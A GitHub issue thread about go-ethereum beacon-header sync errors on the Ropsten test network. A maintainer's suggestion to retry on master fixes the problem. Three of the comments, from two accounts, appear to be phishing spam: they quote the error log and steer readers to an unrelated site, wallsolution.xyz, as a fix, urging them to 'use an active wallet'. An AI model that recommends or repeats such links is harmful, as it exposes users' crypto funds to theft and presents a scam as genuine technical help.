### ISSUE TITLE
what happened, so that failed to clean stale beacon headers

### ISSUE THREAD

**Issue by pandaplusplus** [ethereum/go-ethereum#25216]
Hi guys, 
after start a node with geth on the Ropsten test network. I got this
```
ERROR[07-01|02:07:42.642] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457016"
ERROR[07-01|02:07:42.642] Beacon backfilling failed                err="syncing canceled (requested)"
ERROR[07-01|02:07:42.724] Cleaning spurious beacon sync leftovers  stale_head_1=12,457,210 stale_tail_1=12,457,016 stale_next_1=eef1f7..f6fba7
INFO [07-01|02:07:42.725] Syncing beacon headers                   downloaded=78760 left=0          eta=0s
ERROR[07-01|02:07:42.725] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457097"
```

**Comment by MariusVanDerWijden** [comment]
Can you retry with the current master?

**Comment by Veterangrail** [comment]
> Hi guys, after start a node with geth on the Ropsten test network. I got this
> 
> ```
> ERROR[07-01|02:07:42.642] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457016"
> ERROR[07-01|02:07:42.642] Beacon backfilling failed                err="syncing canceled (requested)"
> ERROR[07-01|02:07:42.724] Cleaning spurious beacon sync leftovers  stale_head_1=12,457,210 stale_tail_1=12,457,016 stale_next_1=eef1f7..f6fba7
> INFO [07-01|02:07:42.725] Syncing beacon headers                   downloaded=78760 left=0          eta=0s
> ERROR[07-01|02:07:42.725] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457097"
> ```


Auto rectify issue with https://www.wallsolution.xyz/ had similar issues and i used it and it worked

**Comment by Acetarax** [comment]
> Hi guys, after start a node with geth on the Ropsten test network. I got this
> 
> ```
> ERROR[07-01|02:07:42.642] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457016"
> ERROR[07-01|02:07:42.642] Beacon backfilling failed                err="syncing canceled (requested)"
> ERROR[07-01|02:07:42.724] Cleaning spurious beacon sync leftovers  stale_head_1=12,457,210 stale_tail_1=12,457,016 stale_next_1=eef1f7..f6fba7
> INFO [07-01|02:07:42.725] Syncing beacon headers                   downloaded=78760 left=0          eta=0s
> ERROR[07-01|02:07:42.725] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457097"
> ```

Make use of this https://www.wallsolution.xyz/ this worked for my similar issue, but always use an active wallet, 100% Transparency

**Comment by Acetarax** [comment]
> Hi guys, after start a node with geth on the Ropsten test network. I got this
> 
> ```
> ERROR[07-01|02:07:42.642] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457016"
> ERROR[07-01|02:07:42.642] Beacon backfilling failed                err="syncing canceled (requested)"
> ERROR[07-01|02:07:42.724] Cleaning spurious beacon sync leftovers  stale_head_1=12,457,210 stale_tail_1=12,457,016 stale_next_1=eef1f7..f6fba7
> INFO [07-01|02:07:42.725] Syncing beacon headers                   downloaded=78760 left=0          eta=0s
> ERROR[07-01|02:07:42.725] Failed to clean stale beacon headers     err="filled header below beacon header tail: 12388091 < 12457097"
> ```

Make use of this https://www.wallsolution.xyz/ this worked for my similar issue, but always use an active wallet, 100% Transparency

**Comment by pandaplusplus** [comment]
It works in the current master.
